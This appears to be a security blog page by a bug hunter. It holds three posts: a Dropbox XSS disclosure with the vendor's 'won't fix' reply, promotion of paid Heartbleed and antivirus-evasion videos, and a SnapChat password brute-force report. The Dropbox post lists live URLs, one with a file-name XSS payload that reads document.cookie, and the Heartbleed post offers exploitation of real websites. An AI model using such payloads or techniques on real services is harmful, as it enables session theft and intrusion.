Welcome to our Blog

The Hacking Post

Read our Blog

(0Day) (won’t fix) Multiple XSS Vulnerabilities in Dropbox website and Dropbox IOS App

Dropbox allows you to upload HTML and SWF files and view them online on your browser and on IOS app.

I uploaded html file containing some javascript code to dropbox then i shared it with another dropbox user and my javascript code got executed on his web browser and his dropbox iOS app :)

BlackHat Hackers knows how to exploit it with indirect hacking methods ( social engineering and phishing )

 

Here is a POC Video:

 

Buy this on Selz Start selling on Selz

 

OR

 

 

Dropbox refused to fix it and their reply was:

 

Reid (Dropbox)

Jun 09 11:04

Hi Mohamed,

Sorry for the delay. Our security team has reviewed your report and has decided that this does not pose a security threat to Dropbox users.

This method would require a user to upload a malicious file onto their own account and then execute it. While it is possible to share a malicious html file to a user and have it executed in a similar manner, this is not considered a security vulnerability. Also, this issue is well mitigated by the fact that the file is hosted on dl-web.dropbox.com, and not on www.dropbox.com.

While it’s not considered a security vulnerability, the security team thanks you for your feedback on this issue and may provide a fix for it at a later date. If there is something we have overlooked please let me know.

We look forward to receiving reports from you in the future.

Best,
Reid

Bonus:

https://dl.dropbox.com/u/12545954/xss.swf

https://dl.dropbox.com/u/12545954/’%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.cookie)%3E.html

 

My Ethical Hacking course on Udemy.com:

https://www.udemy.com/learn-the-basics-of-ethical-hacking-and-penetration-testing/

How to Exploit HeartBleed Vulnerability in REAL WORLD!

Hello my friends,

I made two videos showing you how to exploit HeartBleed Vulnerability on Real Websites!

You will need some Python Scripts and Kali linux to exploit it successfully.

 

How to exploit HeartBleed in Server Side Scenario (Real Websites):

Buy this on Selz Start selling on Selz

 

How to exploit HeartBleed in Client Side Scenario (Real Websites):

Buy this on Selz Start selling on Selz

 

TIP: Register your name and email to get a big discount once we release our new courses:

 

Learn the Basics of Ethical Hacking and Penetration Testing (Version 2014) 

Buy this on Selz Start selling on Selz

 

Bypassing and Evading Anti-Virus Course (Version 2014) 

Buy this on Selz Start selling on Selz

 

Share and enjoy :)

Account Brute Forcing Vulnerability in SnapChat

Hello,

I found a critical vulnerability in SnapChat app in late 2013 and reported it to their security team and they replied to me that they fixed it.

 

This vulnerability allows anyone who knows your SnapChat email to brute force your account’s password without any protection from snapchat side, there is no lockout. limited tries or even Captcha. I immediately reported it to them and they fixed it in 2  months.

 

SnapChat Security/Support Team reply:

Hi Mohamed,

Thank you for following up and for your patience. We’ve made some improvements in this regard, please let us know if you think we’ve adequately addressed the issues raised or if you have other feedback.
Happy new year!
Best,
Tobias
Here is a video showing you how i found and exploited the vulnerability:


Buy this on Selz
Sell digital downloads on Selz

NOTE:
You can join  over 12000 students around the world learning ethical hacking and penetration testing, please join my course:

Awesome Security Courses from Egypt

Get in touch with us!